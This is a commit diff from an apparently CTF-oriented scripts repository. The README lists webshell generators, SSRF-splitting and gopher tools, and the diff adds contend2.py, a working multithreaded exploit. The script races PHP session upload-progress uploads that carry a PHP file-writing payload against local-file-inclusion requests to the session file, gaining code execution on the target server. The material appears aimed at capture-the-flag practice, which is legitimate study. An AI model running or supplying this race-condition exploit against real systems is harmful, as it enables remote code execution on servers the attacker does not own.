new scripts

README.md

@@ -1,10 +1,25 @@
 # CTF-Scripts
 一些简单的scripts，慢慢push
 
+├── README.md
+├── compress-zlib.py 
+├── ffi-leak.php
+├── geneshell.php
+├── geneshell2.php
+├── misc
+│   └── UploadServer.py
+├── node-ssrf-split.js node<=8.0 http.get拆分请求构造，对于生成的数据进行encodeUR操作即可
+├── port-scan.js
+├── serialize.php
+├── thread
+│   ├── contend.py
+│   └── contend2.py
+└── transform
+    ├── convert2javabytes.py
+    ├── encoding.js JS8/16进制/Unicode标准格式转换
+    ├── gopher.py
+    └── gopherConvert.py
 
-* encoding.js: JS8/16进制/Unicode标准格式转换
-
-* node-ssrf-split.js: node<=8.0 http.get拆分请求构造，对于生成的数据进行encodeUR操作即可
 
 * serialize.php: 对于private/protected属性，序列化后S类型转换(截取phpgcc部分功能)
 

thread/contend2.py

@@ -0,0 +1,45 @@
+import threading
+import requests
+from concurrent.futures import ThreadPoolExecutor, wait
+
+target = 'http://192.168.1.162:8080/index.php'
+session = requests.session()
+flag = 'helloworld'
+
+
+def upload(e: threading.Event):
+    files = [
+        ('file', ('load.png', b'a' * 40960, 'image/png')),
+    ]
+    data = {'PHP_SESSION_UPLOAD_PROGRESS': rf'''<?php file_put_contents('/tmp/success', '<?=phpinfo()?>'); echo('{flag}'); ?>'''}
+
+    while not e.is_set():
+        requests.post(
+            target,
+            data=data,
+            files=files,
+            cookies={'PHPSESSID': flag},
+        )
+
+
+def write(e: threading.Event):
+    while not e.is_set():
+        response = requests.get(
+            f'{target}?file=/tmp/sess_{flag}',
+        )
+
+        if flag.encode() in response.content:
+            e.set()
+
+
+if __name__ == '__main__':
+    futures = []
+    event = threading.Event()
+    pool = ThreadPoolExecutor(15)
+    for i in range(10):
+        futures.append(pool.submit(upload, event))
+
+    for i in range(5):
+        futures.append(pool.submit(write, event))
+
+    wait(futures)